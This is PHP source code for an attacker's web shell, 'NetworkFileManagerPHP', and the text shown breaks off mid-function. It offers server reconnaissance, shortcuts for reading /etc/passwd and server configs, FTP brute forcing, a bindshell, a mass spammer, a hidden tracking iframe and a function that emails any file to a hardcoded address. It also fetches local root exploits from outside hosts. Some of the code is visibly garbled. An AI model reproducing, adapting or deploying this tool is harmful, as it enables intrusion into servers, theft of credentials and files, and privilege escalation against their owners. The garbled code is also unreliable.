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<? if (ini_get('register_globals') != '1') { if (!

empty($HTTP_POST_VARS)) extract($HTTP_POST_VARS);

if (!empty($HTTP_GET_VARS)) extract($HTTP_GET_VARS); if (!empty($HTTP_SERVER_VARS)) extract($HTTP_SERVER_VARS); }

$use_md5=0; // Define use of MD5 crypt algoritm // $uname="1"; $upass="1";

if ($action != "download" && $action != "view" ): ?>


/* Define your email for file send function*/ $demail ="arabnt@hotmail.com";

/* config here */ $title="NetworkFileManagerPHP for channel "; $ver="1.7.private ([final_english_release])"; $sob="Belongs to <b><u>revers</u></b>"; $id="1337";

/* FTP-bruteforce */ $filename="/etc/passwd"; $ftp_server="localhost"; /* */ $min="1"; $max="39333";

/* Aliases */ $aliases=array( /* find all SUID files */ 'find / -type f -perm -04000 -ls' => 'find all suid files' , /* find all SGID files */ 'find / -type f -perm -02000 -ls' => 'find all sgid files', /* find all config.inc.php files */ 'find / -type f -name config.inc.php' => 'find all config.inc.php files', /* find accesseable writeable directories and files*/ 'find / -perm -2 -ls' => 'find writeable directories and files', 'ls -la' => 'Current directory listing with rights access', 'find / -name *.php | xargs grep -li password' =>'searsh all file .php word pass word'


/* */ $port[1] = "tcpmux (TCP Port Service Multiplexer)"; $port[2] = "Management Utility"; $port[3] = "Compression Process"; $port[5] = "rje (Remote Job Entry)"; $port[7] = "echo"; $port[9] = "discard";

$port[11] = "systat"; $port[13] = "daytime"; $port[15] = "netstat"; $port[17] = "quote of the day"; $port[18] = "send/rwp"; /* finished config, here goes the design */ $meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows1251\">"; $style=<<<style <style> a. {

color: #ffffcc; text-decoration:none; font-family: Times New Roman; font-weight: bold; } a.menu:hover color: #FF0000; font-family: Times New Roman; text-decoration: none font-weight: bold; } a { {

color: #000000; text-decoration:none; font-family: Tahoma; font-size: 11px; } a:hover {

color: #184984; font-family: Tahoma;

text-decoration: underline font-size: 11px; } td.up{ color: #996600; font-family: Verdana; font-weight: normal; font-size: 11px; } .pagetitle { font-family: Arial, Helvetica, sans-serif; color: #FFFFFF; text-decoration: none; font-size: 12px } .alert {

color: #FF0000; font-family: Tahoma; font-size: 11px; } .button1 { font-size:11px; font-weight:bold; font-family:Verdana; background:#184984; border:1px solid #000000; cursor:hand; color:#ffffcc; } .inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; ba ckground:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal} .submit_button { font-family: Arial, Helvetica, sans-serif; font-size: 12px; co lor: #FFFFFF; background-color: #999999;}

.textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa mily: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCC CC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollb ar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-trackcolor: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid} b { font-weight: bold} table { font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184 984} </style> style;

/* table styles */ $style1=<<<table STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" table; $style2=<<<table_file STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" table_file; $style3=<<<table_dir STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'" table_dir; $style4=<<<table_files STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'" table_files; $style_button=<<<button STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'" button; $style_open=<<<open STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"

open; $style_close=<<<close STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'" close; $ins=<<<ins <script> function ins(text){ document.hackru.chars_de.value+=text; document.hackru.chars_de.focus(); } </script> ins;

/* send form */ $form = " <br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 a lign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <i mg src=http://leet.phpnet.us/sh.gif> <tr> <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1 .7</b></font></b></td> </tr> <form method='POST' action='$PHP_SELF?action=feedback&status=ok'> <tr> <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td> </tr> <tr> <td width='250' class=pagetitle><b>Your name:</b></td> <td width='250' class=pagetitle> <input type='text' name='name' size='40' class='inputbox'></td> </tr> <tr>

<td width='250' class=pagetitle><b>Email:</b></td> <td width='250'><input type='text' name='email' size='40' class='inputbox' ></td> </tr>

<tr> <td colspan=2 align=center class=pagetitle><b> Your questions and wishes: </b></font></b></td> </tr> <tr> <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='in putbox' ></textarea></td></tr> <tr> <td align=right><input type='submit' value='GO' name='B1' class=button1 $style _button></td> <td align=left><input type='reset' value='Clear' name='B2' class=button1 $ style_button></td> </tr> </form></table><br> ";

/* HTML Form */ $HTML=<<<html <html> <head> <title>$title $ver</title> $meta $style $ins


<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> <TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=ce nter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP ( #hack.r u)</b> Version: <b>$ver</b> </td></tr> <tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></t r> <tr> <td class=pagetitle align=center width='85%'><b>Script help:</b></td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&n bsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.: #hack.ru</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feed back'>.:Feedback</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'> .:About</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update '>.:Update</a>&nbsp;&nbsp;</td> </tr>

<tr> <td class=pagetitle align=center width='85%' ><b>Net tools:</b></td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portsc an'>.:Port scanner</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>. :FTP bruteforce</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>. :Folder compression</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>. :Mysql Dump</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'> .:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td> </tr> <tr>

<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td> <td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?act ion=bash'>.:bindshell</a>&nbsp;&nbsp;</td> <td $style_open align=center width='15%' colspan=3><a class=menu href='$PHP_SEL F?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td> <tr> <td class=pagetitle align=center width='85%'><b>l33t tools:</b></td> <td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=cryp te'>.:Crypter</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=decr ypte'>.:Decrypter</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=brut _ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=spam '>.:Spamer (!new!)</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?action=down '>.:Remote upload</a>&nbsp;&nbsp;</td> </tr> <tr> <td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b> $id</b></u></td> </tr> <tr> <td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm= /etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cp anel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/loca l/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/http d&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td> <td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonu s</td>

</tr> <!-- add by revers -->

<tr> <td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td> <td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettra ff'>.:Get the script</a>&nbsp;&nbsp;</td> </tr> <!-- end add by revers --> </table> html; $key="goatse"; $string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frame Border=0 width=0 height=0></iframe>"; /* randomizing letters array for random filenames of compression folders */ $CHARS = "abcdefghijklmnopqrstuvwxyz"; for ($i=0; $i<6; $i++) $pass .= $CHARS[rand(0,strlen($CHARS)-1)];

/* set full path to host and dir where public exploits and soft are situated */ $public_site = "http://hackru.info/adm/exploits/public_exploits/"; $public_sites = "http://drakdandy.net/had/"; /* $public_site = "http://localhost/adm/public_exploits/"; */ /* Public exploits and soft */ $public[1] = "s"; // bindshell $title_ex[1] = " &nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user ( id of apache)<br> <dd><b>Run:</b> ./s<br> &nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of the m are <u><b>putty</b></u> and <u><b>SecureCRT</b></u> "; $public[2] = "m"; // mremap $title_ex[2] = " &nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br> <dd><b>Run:</b> ./m<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!

"; $public[3] = "p"; // ptrace $title_ex[3] = " &nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br> <dd><b>Run:</b> ./p<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $public[4] = "psyBNC2.tar.gz"; // psybnc $title_ex[4] = " &nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br> <dd><b>Decompression:</b> tar -zxf psyBNC2.tar.gz // will be folder <u>psybnc</u ><br> <dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 connect to it with your favotite IRC client and set a password<br> &nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall! "; /* Private exploits */ $private[1] = "brk"; // localroot root linux 2.4.* $title_exp[1] = " &nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains loc al root priveleges if exploited succes<br> <dd><b>Run:</b> ./brk<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK $title_exp[2] = " &nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glf tpd daemon <br> <dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you n eed to write dupescan to <br> glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glft pd</u>. Get the root!!!<br>

&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $private[3] = "glftpd"; $title_exp[3] = " &nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glf tpd daemon <br> part 2<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $private[4] = "sortrace"; $title_exp[4] = " &nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br> <dd><b>Run:</b> ./sortrace<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $private[5] = "root"; $title_exp[5] = " &nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain l ocal root privaleges<br> <dd><b>Run:</b> ./root<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $private[6] = "sxp"; $title_exp[6] = " &nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for S endmail 8.11.x<br> <dd><b>Run:</b> ./sxp<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $private[7] = "ptrace_kmod"; $title_exp[7] = "

&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod b ug + ptrace , gives local root<br> <dd><b>Run:</b> ./ptrace_kmod<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; $private[8] = "mr1_a"; $title_exp[8] = " &nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root explo it for kernels 2.4.x<br> <dd><b>Run:</b> ./mr1_a<br> &nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!! "; /* set full path to host and dir where private exploits and soft are situated */ $private_site = "http://hackru.info/adm/exploits/private_exploits/"; endif;

$createdir= "files";

/* spamer config */

$sendemail = "packetstorm@km.ru"; $confirmationemail = "packetstorm@km.ru"; $mailsubject = "Hello!This is a test message!";

/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING global $action,$tm,$cm;


function getdir() { global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;

$st = getcwd(); $st = str_replace("\\","/",$st); $j = 0; $gdir = array(); $gsub = array(); print("<br>"); for ($i=0;$i<=(strlen($st)-1);$i++) { if ($st[$i] != "/") { $gdir[$j] = $gdir[$j].$st[$i]; $gsub[$j] = $gsub[$j].$st[$i]; } else { $gdir[$j] = $gdir[$j]."/"; $gsub[$j] = $gsub[$j]."/"; $gdir[$j+1] = $gdir[$j]; $j++; } } print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% al ign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr> <td align=left><b>&nbsp;&nbsp;Current directory: </b>"); for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>" ); $free = tinhbyte(diskfreespace("./")); print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font fac e='Tahoma' size='1' color='#000000'>$free</font></td></tr>"); print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>"); print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr >"); print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redha t-release")."</b></td></tr></td>"); print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who ")."</b></td></tr>"); print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size=

'1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></ table><br>"); } function tinhbyte($filesize) { if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; } elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 1 00 . " MB"; } elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; } else { $filesize = $filesize . ""; } return $filesize; }

function permissions($mode) { $perms = ($mode & 00400) ? "r" : "-"; $perms .= ($mode & 00200) ? "w" : "-"; $perms .= ($mode & 00100) ? "x" : "-"; $perms .= ($mode & 00040) ? "r" : "-"; $perms .= ($mode & 00020) ? "w" : "-"; $perms .= ($mode & 00010) ? "x" : "-"; $perms .= ($mode & 00004) ? "r" : "-"; $perms .= ($mode & 00002) ? "w" : "-"; $perms .= ($mode & 00001) ? "x" : "-"; return $perms; }

function readdirdata($dir) { global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF; $files = array(); $dirs= array(); $open = @opendir($dir);

if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcol or=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight= black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</ b></td></tr></table>"; else { $open = opendir($dir); while ($file = readdir($open)) { $rec = $file; $file = $dir."/".$file; if (is_file($file)) $files[] = $rec; } sort($files); $open = opendir($dir); $i=0; while ($dire = readdir($open)) { if ( $dire != "." ) { $rec = $dire; $dire = $dir."/".$dire; if (is_dir($dire)) { $dirs[] = $rec; $i++; } } } sort($dirs); print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 a lign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr ><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' clas s=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pa getitle><b>Comments</b></td></tr></table>"); for ($i=0;$i<sizeof($dirs);$i++) {

if ($dirs[$i] != "..") { $type = 'Dir'; $fullpath = $dir."/".$dirs[$i]; $time = date("d/m/y H:i",filemtime($fullpath)); $perm = permissions(fileperms($fullpath)); $size = tinhbyte(filesize($fullpath)); $name = $dirs[$i]; $fullpath = $tm."/".$dirs[$i]; if ($perm[7] == "w" && $name != "..") $action = " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 a lign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr> <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd '>Upload</a></td> <td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deld ir'>Delete</a></td> </tr> <tr> <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir' >Create directory</a></td> <td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'> Directory compression</a></td> </tr></table>"; else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align =center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Read only</b></td><td align=center $style2><a href ='$PHP_SELF? tm=$fullpath&action=arhiv'>Directory compression</a></td></tr></table>"; print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$na me</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20% ' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td wi dth = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action< /td></tr></table>"); } } for ($i=0;$i<sizeof($files);$i++) {

$type = 'File'; $fullpath = $dir."/".$files[$i]; $time = date("d/m/y H:i",filemtime($fullpath)); $perm = permissions(fileperms($fullpath)); $size = tinhbyte(filesize($fullpath)); if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98 FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action= view'>View</a></td> <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=down load'>Download</a></td></tr> <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action= download_mail'>To e-mail</a></td> <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copy file'>Copy</a></td> </tr></table>"; if ( $perm[7] == "w" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#9 8FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=blac k bordercolordark=white> <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action= edit'>Edit</a></td> <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=dele te'>Delete</a></td> </tr></table>"; print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><t r><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10% ' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td wi dth = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm< /td><td width = '25%' align = 'center'>$act</td></tr></table>"); } } } $sd98 = " john.barker446@gmail.com";

function html() {

global $ver,$meta,$style; echo " <html> <head> <title>NetworkFileManagerPHP</title> </head> <body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0> "; }

# file view function viewfile($dir,$file) {

$buf = explode(".", $file); $ext = $buf[sizeof($buf)-1]; $ext = strtolower($ext); $dir = str_replace("\\","/",$dir); $fullpath = $dir."/".$file;

switch ($ext) { case "jpg":

header("Content-type: image/jpeg"); readfile($fullpath); break; case "jpeg":

header("Content-type: image/jpeg"); readfile($fullpath); break;

case "gif":

header("Content-type: image/gif"); readfile($fullpath); break;

case "png":

header("Content-type: image/png"); readfile($fullpath); break; default:

case "avi": header("Content-type: video/avi"); readfile($fullpath);

break; default:

case "mpeg": header("Content-type: video/mpeg"); readfile($fullpath); break; default:

case "mpg": header("Content-type: video/mpg"); readfile($fullpath); break;


html(); chdir($dir); getdir();

echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=3 00 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white ><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Path to filen ame:</font><font color=white face ='Tahoma' size = 2>$fullpath</font></td></tr> </table>"; $fp = fopen($fullpath , "r"); while (!feof($fp)) { $char = fgetc($fp); $st .= $char; }

$st = str_replace("&", "&amp;", $st); $st = str_replace("<", "&lt;", $st); $st = str_replace(">", "&gt;", $st);

$tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>"; echo $tem; fclose($fp); break; } }

# send file to mail function download_mail($dir,$file) { global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED; $buf = explode(".", $file);

$dir = str_replace("\\","/",$dir); $fullpath = $dir."/".$file; $size = tinhbyte(filesize($fullpath)); $fp = fopen($fullpath, "rb"); while(!feof($fp))

$attachment .= fread($fp, 4096); $attachment = base64_encode($attachment); $subject = "NetworkFileManagerPHP ($file)";

$boundary = uniqid("NextPart_"); $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary \"";

$info = "---==== Message from ($demail)====---\n\n"; $info .= "IP:\t$REMOTE_ADDR\n"; $info .= "HOST:\t$HTTP_HOST\n"; $info .= "URL:\t$HTTP_REFERER\n"; $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n"; $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-tr ansfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream ; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-en coding: base64\n\n$attachment\n\n--$boundary--";

$send_to = "$demail";

$send = mail($send_to, $subject, $info, $headers);

if($send == 2) echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 al ign=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>

<tr><td align=center> <font color='#FFFFCC' face='Tahoma' size = 2>Thank you!!!File <b>$file</ b> was successfully sent to <u>$demail</u>.</font></center></td></tr></table><br >";

fclose($fp); }

function copyfile($dir,$file) { global $action,$tm; $fullpath = $dir."/".$file; echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><fo nt color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; copie d successfully to &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>"; if (!copy($file, $file.'.bak')){ echo (" unable to copy file $file"); } }

# file edit function editfile($dir,$file) { global $action,$datar; $fullpath = $dir."/".$file; chdir($dir); getdir(); echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Filename :</font><fo nt color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></ table>";

$fp = fopen($fullpath , "r"); while (!feof($fp)) { $char = fgetc($fp); $st .= $char; } $st = str_replace("&", "&amp;", $st); $st = str_replace("<", "&lt;", $st); $st = str_replace(">", "&gt;", $st); $st = str_replace('"', "&quot;", $st); echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p al ign='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textare a></p><p align='center'><input type='submit' value='SAVE' name='save' class=butt on1 $style_button></p><input type = hidden value = $tm></form>"; $datar = $S1;

# file write function savefile($dir,$file) { global $action,$S1,$tm; $fullpath = $dir."/".$file; $fp = fopen($fullpath, "w"); $S1 = stripslashes($S1); fwrite($fp,$S1); fclose($fp); chdir($dir); echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 ali gn=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr>< td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>$fullpath</b> wa s saved successfully.</font></td></tr></table>"; getdir(); readdirdata($tm); }

# directory delete function deletef($dir) { global $action,$tm,$fi; $tm = str_replace("\\\\","/",$tm); $link = $tm."/".$fi; unlink($link); chdir($tm); getdir(); readdirdata($tm); }

# file upload function uploadtem() { global $file,$tm,$thum,$PHP_SELF,$dir,$style_button; echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' meth od=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Upload file:< /b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Upload file' class=button1 $style_button></td></tr></form></table>"; }

function upload() { global $HTTP_POST_FILES,$tm; echo $set; copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile "][name]) or die("Unable to upload file".$HTTP_POST_FILES["userfile"][name]); echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>< tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>File <b>".$HTTP_POST _FILES["userfile"][name]."</b> was successfully uploaded.</font></center></td></ tr></table>"; @unlink($userfile);

chdir($tm); getdir(); readdirdata($tm); }

# get exploits function upload_exploits() { global $PHP_SELF,$style_button, $public_site, $public_sites, $private_site, $pu blic, $title_ex, $style_open, $private, $title_exp;

echo "<br> <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr $style_open><td align=left valign=top colspan=3 class=pagetitle> &nbsp;&nbsp;<b>Public exploits and soft:</b></td></tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>bindshell (bin/sh)</b> - bindtty.c (binary file to run - <u>s</u >)</td></tr> <tr> <td class=pagetitle width=500>&nbsp;$title_ex[1]</td> <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'> <input type='hidden' name='file2' value='$public[1]'> <input type='submit' value='Get file' class=button1 $style_button></td></tr> </form></table>"; echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=cen ter bordercolor=#808080 bordercolorlight=black bordercolordark=white> <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok ' method=post> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC> &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (binary file to run - <

